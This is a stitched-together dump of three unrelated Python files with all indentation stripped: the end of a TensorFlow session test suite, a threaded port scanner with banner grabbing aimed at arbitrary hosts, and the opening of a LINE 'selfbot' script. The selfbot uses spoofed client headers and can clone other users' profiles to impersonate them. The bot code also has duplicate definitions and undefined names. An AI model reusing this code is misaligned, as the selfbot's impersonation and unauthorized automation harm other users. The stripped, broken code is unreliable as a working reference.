self.assertTrue(run_metadata.HasField('cost_graph'))
else:
self.assertFalse(run_metadata.HasField('cost_graph'))
def runTestOutputPartitionGraphs(self, sess):
run_options = config_pb2.RunOptions(output_partition_graphs=True)
a = constant_op.constant(1)
run_metadata = config_pb2.RunMetadata()
sess.run(a, options=run_options, run_metadata=run_metadata)
self.assertGreater(len(run_metadata.partition_graphs), 0)
sess.run(a, run_metadata=run_metadata)
self.assertEqual(len(run_metadata.partition_graphs), 0)
def testOutputPartitionGraphsDirect(self):
self.runTestOutputPartitionGraphs(session.Session())
def testOutputPartitionGraphsDistributed(self):
server = server_lib.Server.create_local_server()
self.runTestOutputPartitionGraphs(session.Session(server.target))
def testNonInteractiveSessionNesting(self):
sess1 = session.Session()
sess1_controller = sess1.as_default()
sess1_controller.__enter__()
sess2 = session.Session()
sess2_controller = sess2.as_default()
sess2_controller.__enter__()
with self.assertRaisesRegexp(AssertionError, 'Nesting violated'):
sess1_controller.__exit__(None, None, None)
ops._default_session_stack.reset()
def testInteractiveSessionNesting(self):
sess1 = session.InteractiveSession()
sess2 = session.InteractiveSession()
del sess1
del sess2
def testAsDefault(self):
c = constant_op.constant(37)
sess = session.Session()
with sess.as_default():
self.assertEqual(37, c.eval())
# Ensure that the session remains valid even when it is not captured.
with session.Session().as_default():
self.assertEqual(37, c.eval())
def testReentry(self):
sess = session.Session()
with self.assertRaisesRegexp(RuntimeError, 'not re-entrant'):
with sess:
with sess:
pass
def testInvalidArgument(self):
with self.assertRaisesRegexp(TypeError, 'target must be a string'):
session.Session(37)
with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'):
session.Session(config=37)
with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'):
session.Session(graph=37)
def testTimeoutWithShortOperations(self):
num_epochs = 5
q = data_flow_ops.FIFOQueue(capacity=50, dtypes=[dtypes.int32], shapes=[()])
enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
# Use a 10-second timeout, which should be longer than any
# non-blocking enqueue_many op.
config = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
with session.Session(config=config) as sess:
for _ in range(num_epochs):
sess.run(enqueue_op)
self.assertEqual(sess.run(q.size()), num_epochs * 2)
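# register_session_run_conversion_functions lets user-defined types act as
# fetches and feeds: fetch_fn maps an object to (tensor_list, contraction_fn),
# feed_fn1 maps (object, feed_value) to a list of (tensor, value) pairs, and
# feed_fn2 maps an object to its feedable tensors; registering the same type
# twice raises ValueError, as checked below.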
def testRegisterFetchAndFeedConversionFunctions(self):
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = math_ops.square(tensor)
fetch_fn = lambda squared_tensor: ([squared_tensor.sq], lambda val: val[0])
feed_fn1 = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_fn2 = lambda feed: [feed.sq]
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.assertRaises(ValueError):
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.test_session() as sess:
np1 = np.array([1.0, 1.5, 2.0, 2.5])
np2 = np.array([3.0, 3.5, 4.0, 4.5])
squared_tensor = SquaredTensor(np2)
squared_eval = sess.run(squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
squared_eval = sess.run(
squared_tensor, feed_dict={
squared_tensor: np1 * np1
})
self.assertAllClose(np1 * np1, squared_eval)
partial_run = sess.partial_run_setup([squared_tensor], [])
squared_eval = sess.partial_run(partial_run, squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
def testDefaultLogDevicePlacement(self):
class CaptureStderr(str):
"""Class to capture stderr from C++ shared library."""
def __enter__(self):
self._esc = compat.as_str('\b')
self._output = compat.as_str('')
self._stderr = sys.stderr
self._fd = self._stderr.fileno()
self._out_pipe, in_pipe = os.pipe()
# Save the original io stream.
self._dup_fd = os.dup(self._fd)
# Replace the original io stream with in pipe.
os.dup2(in_pipe, self._fd)
return self
def __exit__(self, *args):
self._stderr.write(self._esc)
self._stderr.flush()
self.read()
os.close(self._out_pipe)
# Restore the original io stream.
os.dup2(self._dup_fd, self._fd)
def read(self):
while True:
data = os.read(self._out_pipe, 1)
if not data or compat.as_str(data) == self._esc:
break
self._output += compat.as_str(data)
def __str__(self):
return self._output
# Passing the config to the server, but not the session should still result
# in logging device placement.
config = config_pb2.ConfigProto(log_device_placement=True)
server = server_lib.Server.create_local_server(config=config)
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
with session.Session(server.target) as sess:
with CaptureStderr() as log:
sess.run(c)
# Ensure that we did log device placement.
self.assertTrue('/job:local/replica:0/task:0/device:CPU:0' in str(log),
str(log))
def testLocalMasterSessionTimeout(self):
# Test that the timeout passed in a config to the session works correctly.
config = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server()
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target, config=config) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def testDefaultServerTimeout(self):
# Test that the default server config timeout gets used when no Session
# config is provided.
config = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server(config=config)
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def runTestBuildGraphError(self, sess):
# Ensure that errors from building the graph get propagated.
data = array_ops.placeholder(dtypes.float32, shape=[])
# pylint: disable=protected-access
enter_1 = gen_control_flow_ops._enter(data, 'foo_1', False)
enter_2 = gen_control_flow_ops._enter(data, 'foo_2', False)
# pylint: enable=protected-access
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError('has inputs from different frames'):
sess.run(res, feed_dict={data: 1.0})
def testBuildGraphErrorDirect(self):
self.runTestBuildGraphError(session.Session())
def testBuildGraphErrorDist(self):
server = server_lib.Server.create_local_server()
self.runTestBuildGraphError(session.Session(server.target))
def testDeviceAttributes(self):
attrs = session._DeviceAttributes(
'/job:worker/replica:0/task:3/device:CPU:2', 'TYPE', 1337)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:2', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def testDeviceAttributesCanonicalization(self):
attrs = session._DeviceAttributes('/job:worker/replica:0/task:3/cpu:1',
'TYPE', 1337)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:1', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def runTestAddFunctionToSession(self, target=''):
"""Add a function to a session after the graph has already been run."""
@function.Defun(dtypes.float32)
def foo(x):
return x + 1
x = constant_op.constant(1.0)
with session.Session(target=target) as sess:
sess.run(x)
f = foo(x)
result = sess.run(f)
self.assertEqual(result, 2.0)
def testAddFunctionToSession(self):
self.runTestAddFunctionToSession()
def testAddFunctionToGrpcSession(self):
server = server_lib.Server.create_local_server()
self.runTestAddFunctionToSession(server.target)
def testOpenAndCloseGrpcSession(self):
server = server_lib.Server.create_local_server()
with session.Session(server.target):
pass
def testOpenAndCloseSession(self):
with session.Session():
pass
def testAutoConvertAndCheckData(self):
with self.test_session() as sess:
a = array_ops.placeholder(dtype=dtypes.string)
with self.assertRaisesRegexp(
TypeError, 'Type of feed value 1 with type <(\w+) \'int\'> is not'):
sess.run(a, feed_dict={a: 1})
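# The following class exercises graph mutation after a Session has already run:
# with the C API enabled, updating an op's inputs, device, or attributes after a
# run should raise FailedPreconditionError on the next run in the same session.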
class GraphMutationTest(test_util.TensorFlowTestCase):
def setUp(self):
self._original_use_c_api_value = ops._USE_C_API
ops._USE_C_API = True
super(GraphMutationTest, self).setUp()
def tearDown(self):
ops._USE_C_API = self._original_use_c_api_value
super(GraphMutationTest, self).tearDown()
def testUpdateInputAfterRunning(self):
with ops.Graph().as_default() as g:
a = constant_op.constant(1.0)
b = constant_op.constant(2.0)
c = a + b
with session.Session(graph=g) as sess:
self.assertAllEqual(3.0, sess.run(c))
c.op._update_input(1, a) # pylint: disable=protected-access
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'add.*was changed by updating input tensor after it was run'):
sess.run(c)
# Check that running the graph with a new session is fine
with session.Session(graph=g) as sess2:
self.assertAllEqual(2.0, sess2.run(c))
def testSetDeviceAfterRunning(self):
with ops.Graph().as_default() as g:
a = constant_op.constant(1.0)
b = constant_op.constant(2.0)
c = a + b
with session.Session(graph=g) as sess:
self.assertAllEqual(3.0, sess.run(c))
c.op._set_device('/cpu:0') # pylint: disable=protected-access
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'add.*was changed by setting device after it was run'):
sess.run(c)
def testSetAttrAfterRunning(self):
with ops.Graph().as_default() as g:
a = constant_op.constant(1.0, dtype=dtypes.float32)
b = math_ops.cast(a, dtypes.float64)
with session.Session(graph=g) as sess:
self.assertAllEqual(1.0, sess.run(b))
b.op._set_attr('DstT', attr_value_pb2.AttrValue(type=types_pb2.DT_FLOAT))
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'Cast.*was changed by setting attribute after it was run'):
sess.run(b)
def testRunModifyRun(self):
with ops.Graph().as_default() as g:
a = constant_op.constant(1.0)
b = constant_op.constant(2.0)
c = a + b
with session.Session(graph=g) as sess:
self.assertAllEqual(3.0, sess.run(c))
d = b + c
d.op._update_input(0, a) # pylint: disable=protected-access
self.assertAllEqual(3.0, sess.run(c))
self.assertAllEqual(4.0, sess.run(d))
def testRunModifyRunTwoSessions(self):
with ops.Graph().as_default() as g:
a = constant_op.constant(1.0)
b = constant_op.constant(2.0)
c = a + b
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(3.0, sess1.run(c))
self.assertAllEqual(3.0, sess2.run(c))
d = b + c
d.op._update_input(0, a) # pylint: disable=protected-access
self.assertAllEqual(3.0, sess2.run(c))
self.assertAllEqual(4.0, sess2.run(d))
d.op._update_input(0, b) # pylint: disable=protected-access
self.assertAllEqual(3.0, sess1.run(c))
self.assertAllEqual(5.0, sess1.run(d))
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'add.*was changed by updating input tensor after it was run'):
sess2.run(c)
def testTwoSessionsOneRunBeforeModification(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0)
b = constant_op.constant(2.0)
c = a + b
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
sess1.run(c)
c.op._set_device('/cpu:0') # pylint: disable=protected-access
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'add.*was changed by setting device after it was run'):
sess1.run(c)
# sess2 was not run before modification
self.assertAllEqual(3.0, sess2.run(c))
def testTwoSessionsBothRunBeforeModification(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0)
b = constant_op.constant(2.0)
c = a + b
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
sess1.run(c)
sess2.run(c)
c.op._set_device('/cpu:0') # pylint: disable=protected-access
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'add.*was changed by setting device after it was run'):
sess1.run(c)
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'add.*was changed by setting device after it was run'):
sess2.run(c)
if __name__ == '__main__':
googletest.main()
|
main.py
|
import socket
# python3 -m pip install IPy
from IPy import IP
from threading import Thread
"""
This is a basic port scanner. When you run it you will be asked for 3 inputs:
Enter target(s) to scan (split targets with ','):
These are the targets, an example could be:
google.com, 192.168.1.1, facebook.com
[OPTIONAL] Timeout (seconds):
This is the timeout; the higher the timeout, the more accurate the results. The default timeout is (number of targets * 3) seconds.
For higher accuracy I'd recommend setting it to (number of targets * 10). This will take a lot longer but will return better results.
Ports:
These are the ports you want to scan, an example of this would be:
70-80, 100, 119-122
The above input will result in ports 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 100, 119, 120, 121, 122 being scanned
I tried my best to add threads, I'm still fairly new to the topic tho :)
"""
def check_ip(ipaddress: str):
"""
Validate an IP address or resolve a domain name to one. Returns the IP address string on
success, or False (after printing an error message) if the input is empty or invalid.
"""
if ipaddress == "":
print("No IP address or domain was provided")
return False
try:
IP(ipaddress)  # validate as an IP address; IP() raises ValueError if it is not one
return ipaddress
except ValueError: # if a domain name was entered
try:
# converts domain name to IP address (google.com -> 172.217.170.14)
return socket.gethostbyname(ipaddress)
except socket.gaierror:
print("Domain specified is invalid")
return False
def scan_port(target: str, port: int, timeout: float) -> None:
"""
Scan a single port on the given target and print a line when the port is open; closed or
filtered ports are silently skipped. The default timeout is (number of targets * 3) seconds,
and timeouts shorter than 0.1 seconds are rejected. The higher the timeout the more accurate
the scan, but the longer it will take.
"""
target = target.strip()
converted_ip = check_ip(target)
try:
sock = socket.socket()
if timeout < 0.1:
print("Timeout is too short")
return
sock.settimeout(timeout)
if converted_ip: # only scan the ports if valid info was added
sock.connect((converted_ip, port))
try:
banner = sock.recv(1024)
print(f"[{target}]\tOpen port {port} :", banner.decode().strip('\n'))
except socket.timeout:
print(f"[{target}]\tOpen port {port}")
except Exception:
pass  # closed/filtered ports simply fail to connect; ignore them
def scan(targets: tuple, ports: list, timeout=5) -> None:
"""
targets: the IP or domain of the target(s) in tuple form eg: ("google.com", "192.168.1.1")
ports: list of ports to scan
timeout: when to stop waiting for response (the higher the timeout the more accurate the results)
This function will scan the targets and their ports.
"""
print(f"Timeout: {timeout} seconds")
print()
scan_ports = []
for i in ports:
if '-' in i:
begin_port, end_port = tuple(i.split("-"))
scan_ports.extend(range(int(begin_port.strip()), int(end_port.strip()) + 1))
else:
scan_ports.append(int(i.strip()))
threads = []
try:
for target in targets:
for port in scan_ports:
threads.append(Thread(target=scan_port, args=(target, port, float(timeout))))
except TypeError:  # raised while building the thread list if targets is not iterable
pass
else:
for t in threads:
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
targets = input("Enter target(s) to scan (split targets with ','): ")
timeout = input("Timeout (seconds): ")
ports = input("Ports (example: 75-80, 112, 115-117): ")
# targets = "192.168.1.1, google.com, facebook.com"
# timeout = ""
# ports = "50-80, 120"
if not (targets.strip() == "") and not (ports.strip() == ""):
# splitting on ',' also handles a single target (it yields a one-element list)
scan(tuple(targets.split(',')), timeout=(float(timeout) if timeout.strip() != "" else len(targets.split(',')) * 3), ports=ports.split(","))
else:
print("Invalid target or ports")
|
sbonly.py
|
# -*- coding: utf-8 -*-
from thrift.transport import TTransport, TSocket, THttpClient, TZlibTransport
from thrift.protocol import TCompactProtocol,TMultiplexedProtocol,TProtocol
from thrift.server import THttpServer,TServer,TProcessPoolServer
import lineX
from lineX import *
from akad.ttypes import *
from thrift.Thrift import *
from thrift.TMultiplexedProcessor import *
from thrift.TSerialization import *
from thrift.TRecursive import *
from thrift.protocol import TCompactProtocol
from thrift import transport, protocol, server
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re,os,subprocess,asyncio
from datetime import datetime, timedelta
from threading import Thread
from time import sleep
from bs4 import BeautifulSoup
from humanfriendly import format_timespan, format_size, format_number, format_length
import time, random, sys, json, codecs, threading, glob, re, string, os, requests, subprocess, six, ast, pytz, urllib, urllib.parse,youtube_dl,pafy,timeit,atexit,traceback,ffmpy,humanize
from googletrans import Translator
from ttypes import LoginRequest
import json, requests, LineService
from thrift.transport import THttpClient
#========================================================================
_session = requests.session()
botStart = time.time()
print("LOGIN INDUK")
cl = LINE("")
cl.log("Auth Token : " + str(cl.authToken))
print("\nɪɴᴇxʙᴏᴛs.ʟɪɴᴇ ᴠᴇʀ.8.14.2 ᴘʀᴏᴛᴇᴄᴛ \n__________________________")
"""
ɪɴᴇxʙᴏᴛs.ʟɪɴᴇ ᴠᴇʀ.8.14.2 ᴘʀᴏᴛᴇᴄᴛ
"""
print("login success")
oepoll = OEPoll(cl)
call = cl
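# LINE user MIDs with elevated privileges; the command handlers check membership in
# these lists before allowing protected actions.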
creator = ["u133f7110dd00e635f0776957837055a2"]
owner = ["u133f7110dd00e635f0776957837055a2"]
admin = ["u133f7110dd00e635f0776957837055a2"]
staff = ["u133f7110dd00e635f0776957837055a2"]
#☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤
mid = cl.getProfile().mid
KAC = [cl]
ABC = [cl]
Bots = [mid]
Denjaka = admin + staff
protectqr = []
protectkick = []
protectjoin = []
protectinvite = []
protectcancel = []
protectantijs = []
ghost = []
msg_dict = {}
msg_dict1 = {}
offbot = []
welcome = []
#☠•➤☠•➤☠•➤☠•INEX KILLERS➤☠•➤☠•➤☠•➤☠•➤☠•➤
nama1 = 'InexBots'
Headers3 = {
'User-Agent': "CHROMEOS\t9.0.3Bot-Eater\t17.09",
'X-Line-Application': "CHROMEOS 1.7.14 BotEater x64",
"x-lal": "ja-US_US",
}
#☠•➤☠•➤☠•➤☠•INEX KILLERS FAMS➤☠•➤☠•➤☠•➤☠•➤☠•➤
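# Feature flags and per-feature state for the selfbot (profile cloning, sticker/image
# capture, auto-join, mimic, etc.); these are presumably toggled at runtime by chat
# commands defined further down the script.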
settings = {
"autoBlock": False,
"autoRead": False,
"welcome": False,
"leave": False,
"mid": False,
"replySticker": False,
"stickerOn": False,
"checkContact": False,
"postEndUrl": True,
"checkPost": False,
"setKey": False,
"restartPoint": False,
"checkSticker": False,
"userMentioned": False,
"listSticker": False,
"messageSticker": False,
"changeGroupPicture": [],
"keyCommand": "",
"AddstickerTag": {
"sid": "",
"spkg": "",
"status": False
},
"Addsticker":{
"name": "",
"status":False
},
"stk":{},
"stickerset": {
"STKID":"",
"STKVER":"",
"STKPKGID":"",
"status": False
},
"selfbot":True,
"Images":{},
"Img":{},
"Addimage":{
"name": "",
"status":False
},
"Videos":{},
"Addaudio":{
"name": "",
"status":False
},
"Addvideo":{
"name": "",
"status":False
},
"myProfile": {
"displayName": "",
"coverId": "",
"pictureStatus": "",
"statusMessage": ""
},
"mimic": {
"copy": False,
"status": False,
"target": {}
},
"unsendMessage": False,
"Picture":False,
"group":{},
"groupPicture":False,
"changePicture":False,
"changeProfileVideo": False,
"ChangeVideoProfilevid":{},
"ChangeVideoProfilePicture":{},
"autoJoinTicket":False,
"SpamInvite":False,
"displayName": "",
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.200.32.99 Safari/537.36"
]
}
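# Additional runtime state: permission maps, blacklists, auto-join/auto-add toggles,
# and the canned texts used for welcome, mention, and broadcast replies.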
wait = {
"limit": 2,
"owner":{},
"admin":{},
"Timeline":False,
"addadmin":False,
"delladmin":False,
"staff":{},
"denjaka":{},
"likeOn": True,
"addstaff":False,
"dellstaff":False,
"bots":{},
"addbots":False,
"dellbots":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Talkblacklist":{},
"Talkwblacklist":False,
"Talkdblacklist":False,
"talkban":True,
"contact":False,
"autoJoin":True,
"autoAdd":True,
"autoCancel":{"on":True, "members":1},
"autoLeave":False,
"autoLeave1":False,
"detectMention":False,
"detectMention2":False,
"arespon":False,
"Mentionkick":False,
"welcomeOn":False,
"sticker":False,
"unsend":True,
"selfbot":True,
"link1": "Chrome 1",
"link2": "Ios 1",
"link3": "Win 1",
"autoJoinMessage": "ᴛᴇʀɪᴍᴀᴋᴀsɪʜ ᴋᴀᴋᴀ ᴀᴛᴀs ᴜɴᴅᴀɴɢᴀɴ ɢʀᴜᴘɴʏᴀ.",
"comment1": "ᴀᴜᴛᴏ ʟɪᴋᴇ ɴ ᴄᴏᴍᴍᴇɴᴛ ᴅᴏɴᴇ\nвʏ.ᴛᴇᴀᴍ ⊶ ɪɴᴇxʙᴏᴛs ⊷ \nline.me/ti/p/~denjaka-inexx",
"comment2": "╭━━━━━━━━━━━━━━━━━━━━━━━━\n┃ ╔══════════════════━━━━╮\n┃ ║ ❀ BY BOT : INEXBOTS ❀\n┃ ╚══════════════════━━━━╯\n├━━━━━━━━━━━━━━━━━━━━━━━━\n┃ ╔══════════════════━━━━╮\n┃ ║ ❀ LIKE DONE \n┃ ║ ❀ COMMENT DONE \n┃ ║ ❀ INEXBOTS_TEAM\n┃ ╚══════════════════━━━━╯\n├━━━━━━━━━━━━━━━━━━━━━━━━\n┃ ╔══════════════════━━━━╮\n┃ ║ http://line.me/ti/p/~denjaka-inexx\n┃ ╚══════════════════━━━━╯\n╰━━━━━━━━━━━━━━━━━━━━━━━━",
"mention":"ᴋᴀʟᴏ ɴɢɪɴᴛɪᴘ ᴛᴇʀᴜs ᴅᴀᴘᴇᴛ ɢᴇʟᴀs ᴘᴇᴄᴀʜ ᴅɪ ᴋᴇᴘᴀʟᴀ...",
"Respontag":"ᴊᴀɴɢᴀɴ ᴛᴀɢ ʙᴀᴇ ᴋᴀᴋ,,, ɴɢᴏᴍᴏɴɢ ᴀᴊᴀ ᴋᴀʟᴏ ᴄɪɴᴛᴀ ᴀᴋᴜ ᴍᴀʜ.",
"Respontag2":"ᴊᴀɴɢᴀɴ ᴛᴀɢ ʙᴀᴇ ᴋᴀᴋ,,, ɴɢᴏᴍᴏɴɢ ᴀᴊᴀ ᴋᴀʟᴏ ᴄɪɴᴛᴀ ᴀᴋᴜ ᴍᴀʜ.",
"Responpm":"maaf,,, Ada apa kak tag saya di grup!",
"welcome":"丂乇ㄥ卂爪卂ㄒ 乃乇尺Ꮆ卂乃ㄩ几Ꮆ Ҝ卂Ҝ,,, 丂乇爪ㄖᎶ卂 乃乇ㄒ卂卄",
"commentPost":"ᴀᴜᴛᴏ ʟɪᴋᴇ ɴ ᴄᴏᴍᴍᴇɴᴛ ᴅᴏɴᴇ\nвʏ.ᴛᴇᴀᴍ ⊶ ɪɴᴇxʙᴏᴛs ⊷ \nline.me/ti/p/~denjaka-inexx",
"message":"тᴇяıмᴀ кᴀsıн suᴅᴀн ᴀᴅᴅ sᴀʏᴀ \nвʏ.ᴛᴇᴀᴍ ⊶ ɪɴᴇxʙᴏᴛs ⊷ \nline.me/ti/p/~denjaka-inexx"
}
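# protect appears to hold per-group protection lists (QR link, invites, etc.);
# read and cctv track read receipts and lurker ("sider") detection per chat.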
protect = {
"pqr":[],
"pinv":[],
"proall":[],
"protect":[]
}
read = {
"readPoint":{},
"readMember":{},
"readTime":{},
"ROM":{},
}
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
myProfile = {
"displayName": "",
"statusMessage": "",
"pictureStatus": ""
}
jakaProfile = cl.getProfile()
myProfile["displayName"] = jakaProfile.displayName
myProfile["statusMessage"] = jakaProfile.statusMessage
myProfile["pictureStatus"] = jakaProfile.pictureStatus
imagesOpen = codecs.open("image.json","r","utf-8")
videosOpen = codecs.open("video.json","r","utf-8")
stickersOpen = codecs.open("sticker.json","r","utf-8")
audiosOpen = codecs.open("audio.json","r","utf-8")
plates = codecs.open("template.json","r","utf-8")
movieOp = codecs.open("movie.json","r","utf-8")
mengirim = json.load(movieOp)
plate = json.load(plates)
images = json.load(imagesOpen)
videos = json.load(videosOpen)
stickers = json.load(stickersOpen)
audios = json.load(audiosOpen)
Setbot = codecs.open("setting.json","r","utf-8")
Setmain = json.load(Setbot)
mulai = time.time()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cont = cl.getContact(mid)
Import_Server = plate["Server_BUG"]
for Allbots in ABC:
for LineX in Import_Server:
try:
Allbots.findAndAddContactsByMid(LineX)
except:pass
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def logError(text):
cl.log("[ ERROR ] {}".format(str(text)))
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.now(tz=tz)
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
bln = bulan[int(bln) - 1]  # '%m' yields '01'..'12'; map it to the month name
log_time = "{}, {} - {} - {} | {}".format(str(hasil), str(inihari.strftime('%d')), str(bln), str(inihari.strftime('%Y')), str(inihari.strftime('%H:%M:%S')))
with open("logError.txt","a") as error:
error.write("\n[ {} ] {}".format(str(log_time), text))
Devert = "My name is "+cont.displayName+" use your bot script Templates\n\nhttps://github.com/InexBots"
def delete_log():
ndt = datetime.now()
for data in list(msg_dict):  # iterate over a copy; entries may be deleted below
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > timedelta(1):
if "path" in msg_dict[data]:
cl.deleteFile(msg_dict[data]["path"])
del msg_dict[data]
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version:
import urllib.request
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers = headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else:
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
def delete_log():
ndt = datetime.now()
for data in list(msg_dict):  # iterate over a copy; entries may be deleted below
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > timedelta(1):
del msg_dict[data]
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item)
time.sleep(0.1)
page = page[end_content:]
return items
def downloadImageWithURL (mid):
contact = cl.getContact(mid)
if contact.videoProfile == None:
cl.cloneContactProfile(mid)
else:
profile = cl.getProfile()
profile.displayName, profile.statusMessage = contact.displayName, contact.statusMessage
cl.updateProfile(profile)
pict = cl.downloadFileURL('http://dl.profile.line-cdn.net/' + contact.pictureStatus, saveAs="tmp/pict.bin")
vids = cl.downloadFileURL( 'http://dl.profile.line-cdn.net/' + contact.pictureStatus + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = cl.getProfileDetail(mid)['result']['objectId']
cl.updateProfileCoverById(coverId)
def restartBot():
python = sys.executable
os.execl(python, python, *sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def runtime(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def sendImage(to, path, name="image"):
try:
if settings["server"] == "VPS":
client.sendImageWithURL(to, str(path))
except Exception as error:
logError(error)
def delExpire():
if temp_flood != {}:
for tmp in temp_flood:
if temp_flood[tmp]["expire"] == True:
if time.time() - temp_flood[tmp]["time"] >= 3*10:
temp_flood[tmp]["expire"] = False
